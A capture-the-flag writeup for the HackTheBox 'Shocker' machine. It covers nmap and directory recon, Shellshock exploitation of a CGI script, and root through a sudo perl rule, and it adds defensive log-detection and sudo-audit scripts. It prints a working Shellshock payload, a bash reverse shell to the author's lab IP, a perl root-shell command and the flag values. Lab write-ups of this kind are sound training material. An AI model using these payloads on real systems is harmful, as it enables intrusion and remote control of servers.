# Shocker

Shocker is an easy-rated Linux machine from [HackTheBox](https://app.hackthebox.com/machines/Shocker), created by mrb3n. In this writeup my IP is 10.10.14.210 and the target IP is 10.129.37.21.

## Recon

The first steps are about gathering basic information on the target, using nmap and looking through the website.

{% code title="Local Terminal" %}

```bash
ping -c 1 10.129.37.21
```

{% endcode %}

```bash
Haciendo ping a 10.129.37.21 con 32 bytes de datos:
Respuesta desde 10.129.37.21: bytes=32 tiempo=628ms TTL=63
Respuesta desde 10.129.37.21: bytes=32 tiempo=165ms TTL=63

Estadísticas de ping para 10.129.37.21:
    Paquetes: enviados = 2, recibidos = 2, perdidos = 0
    (0% perdidos),
```

By the TTL we can assume it is a Linux machine: Linux uses a default TTL of 64, and one hop along the route brings it down to 63.

{% code title="Local Terminal" %}

```bash
nmap -p- --open -sS --min-rate 5000 -vvv -n 10.129.37.21
```

{% endcode %}

```bash
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE      REASON
80/tcp   open  http         syn-ack ttl 62
2222/tcp open  EtherNetIP-1 syn-ack ttl 62

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 16.62 seconds
           Raw packets sent: 78689 (3.462MB) | Rcvd: 76654 (3.066MB)
```

Then we try to get the version and run the default scripts with Nmap on each port.

{% code title="Local Terminal" overflow="wrap" %}

```bash
nmap -sCV -p 80,2222 10.129.37.21
```

{% endcode %}

```bash
Nmap scan report for 10.129.37.21
Host is up (0.16s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.29 seconds
```

Two relevant ports were found: port 80, where the target web service is hosted, and the SSH service, which is located on port 2222.

As a side note, if you search Google for "OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 launchpad", you will find the build it uses, in this case Ubuntu Xenial. If we get onto the machine and confirm it is the same release, we can assume it is not a container.

{% code title="Local Terminal" overflow="wrap" %}

```bash
whatweb http://10.129.37.21:80
```

{% endcode %}

{% code overflow="wrap" %}

```bash
http://10.129.37.21:80 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.37.21]
```

{% endcode %}

At first glance there is nothing important; let's look at the website directly.

## Web Exploring

In the source code there is absolutely nothing... let's fuzz it!

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FAyYC90wvgHU8pjBjYsUP%2Fimage.png?alt=media&#x26;token=1464aba8-df0f-45d9-bfd6-8bd6717a7343" alt=""><figcaption></figcaption></figure>

{% code title="Local Terminal" %}

```bash
python3 dirsearch.py -u http://10.129.37.21/ -e php,html,js --crawl
```

{% endcode %}

```bash
Extensions: php, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 10625

Output: /shared/github/dirsearch/reports/http_10.129.37.21/__24-08-27_21-13-29.txt

Target: http://10.129.37.21/

[21:13:29] Starting:
[21:15:15] 403 -  295B  - /cgi-bin/
[21:17:06] 403 -  300B  - /server-status
[21:17:06] 403 -  301B  - /server-status/
```

{% code title="Local Terminal" %}

```bash
python3 dirsearch.py -u http://10.129.37.21/cgi-bin/ --crawl -e html,php,js,sh,cgi,pl
```

{% endcode %}

There seem to be several odd paths, but after visiting them the most curious one is `/cgi-bin/user.sh`, which downloads a file when you open it.

## Exploit CGI-based web server

{% code title="Local Terminal" %}

```bash
cat user.sh
```

{% endcode %}

```bash
Content-Type: text/plain

Just an uptime test script

 17:21:40 up  3:50,  0 users,  load average: 0.00, 0.00, 0.00
```

A fragment of a request? It seems to be the browser handling it badly... the alternative is to see what Burp Suite gets when sending a request to the same place.

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FNWo2nXrVchbR3TdSUgC7%2Fimage.png?alt=media&#x26;token=0a91bcef-4c75-41fd-92c3-edff9b9773d9" alt=""><figcaption></figcaption></figure>

Now we know it gets downloaded because of the space on line 8; otherwise it would display your current uptime as plain text. Either way the information is the same: it is a script that runs in bash.

### Finding

Looking further into it, we find that there is a family of vulnerabilities in CGI-based web servers, known as Shellshock, that would let us change the command the simple script executes and achieve RCE:

{% embed url="https://en.wikipedia.org/wiki/Shellshock_(software_bug)" %}

To confirm it is present, nmap has a script that will detect whether the target is vulnerable or not.

{% code title="Local Terminal" %}

```bash
nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/user.sh 10.129.37.21
```

{% endcode %}

```bash
Nmap scan report for 10.129.37.21
Host is up (0.040s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-shellshock:
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known
|       as Shellshock. It seems the server is executing commands injected
|       via malicious HTTP headers.
|
|     Disclosure date: 2014-09-24
|     References:
|       http://www.openwall.com/lists/oss-security/2014/09/24/10
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
|       http://seclists.org/oss-sec/2014/q3/685
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
```

As we can see, the target is indeed vulnerable to Shellshock; it is good to keep this script in mind for paths ending in .sh.
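As an added example, not part of the original writeup: the defender's counterpart to the nmap check above is spotting these probes in the web server's own logs. The Apache combined-log lines below are constructed for the demo, and the function names are my own.

```shell
#!/usr/bin/env bash
# Added example, not from the original writeup: flag Shellshock-style
# payloads in an Apache combined access log. Log lines are constructed
# for the demo; file and function names are assumptions.

# Constructed sample: two Shellshock probes against user.sh, two benign hits.
SAMPLE_LOG='10.10.14.210 - - [27/Aug/2024:21:20:01 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :;}; echo; /usr/bin/id"
10.10.14.210 - - [27/Aug/2024:21:20:05 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 0 "() { :; }; /bin/bash -c id" "Mozilla/5.0"
10.10.14.33 - - [27/Aug/2024:21:21:10 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.10.14.33 - - [27/Aug/2024:21:21:12 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/7.88.1"'

# A vulnerable bash imports a function from any environment variable whose
# value starts with "() {" and runs what follows it. mod_cgi copies request
# headers into HTTP_USER_AGENT, HTTP_REFERER, ... so that prefix in any
# header field of a CGI request is the signature worth alerting on.
SHELLSHOCK_RE='\(\)[[:space:]]*\{'

# Print every log line carrying the signature. Usage: detect_shellshock < access.log
detect_shellshock() {
    grep -E "$SHELLSHOCK_RE" || true
}

# Number of matching lines on stdout (0 when there are none).
count_shellshock() {
    grep -cE "$SHELLSHOCK_RE" || true
}

# Source addresses that sent a payload, with hit counts, for blocking/triage.
shellshock_sources() {
    detect_shellshock | awk '{print $1}' | sort | uniq -c
}

# Demo on the constructed sample.
printf '%s\n' "$SAMPLE_LOG" | detect_shellshock
printf 'shellshock attempts: %s\n' "$(printf '%s\n' "$SAMPLE_LOG" | count_shellshock)"
```

The second sample line carries the payload in the Referer rather than the User-Agent, which is why the check covers the whole line and not just one field.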

### Exploit

Now, to exploit it, you have to change the User-Agent in Burp Suite to the following:

```
User-Agent: () { :;}; echo; /usr/bin/id
```

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2F3aKI750jn3bhXitXQMK3%2Fimage.png?alt=media&#x26;token=c5edca90-6977-4666-8634-39ba898b47c7" alt=""><figcaption></figcaption></figure>

It worked! We just executed the `id` command; now we only need to get a reverse shell. First open a listener with netcat, then inject the code.

{% code title="Local Terminal" %}

```bash
nc -nlvp 443
```

{% endcode %}

{% code title="Burpsuite:" %}

```
User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.210/443 0>&1
```

{% endcode %}

{% embed url="https://app.gitbook.com/o/72N3ASFKYjtNgddXyDWM/s/NqjbvJ4m6enB6HiVWSTQ/cybersecurity/tip-and-tricks/bash-upgrade" %}
Bash Upgrade: to improve the shell
{% endembed %}

{% code title="Shelly Terminal" %}

```bash
cat /home/shelly/user.txt
```

{% endcode %}

```bash
b716b78e5f7c694f83816d74b551603b
```

And done! We have the first flag!

## Privilege Escalation

Now we run the basic enumeration commands to gather information.

{% code title="Shelly Terminal" %}

```bash
shelly@Shocker:/home/shelly$ id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
shelly@Shocker:/home/shelly$ whoami
shelly
shelly@Shocker:/home/shelly$ uname -a
Linux Shocker 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
shelly@Shocker:/home/shelly$ sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/home/shelly$
```

{% endcode %}

As **shelly** we can run perl without a password, and that makes escalation easy, since perl can be run with sudo.

{% code title="Shelly Terminal" overflow="wrap" %}

```bash
sudo perl -e 'exec "/bin/bash"'
```

{% endcode %}

{% code title="Root Terminal" %}

```bash
cat /root/root.txt
efa679e728a151b3149bd357fa6039a1
```

{% endcode %}
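As an added example, not part of the original writeup: the `NOPASSWD: /usr/bin/perl` rule above is one instance of a wider misconfiguration, sudo rights on any shell or scripting interpreter. The function below audits `sudo -l` output for that class; the sample output is constructed and the names are my own.

```shell
#!/usr/bin/env bash
# Added example, not from the original writeup: audit "sudo -l" output for
# rules that hand root to a shell or a scripting interpreter, the class of
# misconfiguration the perl rule above belongs to. Sample output and the
# function names are constructed/assumed for the demo.

# Shells and interpreters that can exec another program, so a sudo rule on
# them is equivalent to a sudo rule on /bin/bash (as perl shows above).
RISKY_INTERPRETERS='perl|python[0-9.]*|ruby|bash|sh|dash|zsh|env'

# Constructed "sudo -l" output modelled on the shelly entry; the systemctl
# rule is added as a contrasting, narrowly scoped example.
SAMPLE_SUDO_L='Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/systemctl restart apache2'

# Print each "(root ...)" rule whose command basename is a risky interpreter.
# Usage: sudo -l | audit_sudo_rules
audit_sudo_rules() {
    grep -E '^[[:space:]]*\(root[^)]*\)' \
    | grep -E "/(${RISKY_INTERPRETERS})([[:space:]]|$)" || true
}

# Exit 0 when no risky rule exists, 1 otherwise (usable from cron or CI).
sudo_rules_ok() {
    [ -z "$(audit_sudo_rules)" ]
}

# Demo on the constructed sample.
printf '%s\n' "$SAMPLE_SUDO_L" | audit_sudo_rules
```

Run it as `sudo -l | audit_sudo_rules` on a host you administer; the fix for a flagged rule is to replace the interpreter with a wrapper script that takes no arguments and is not writable by the user.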
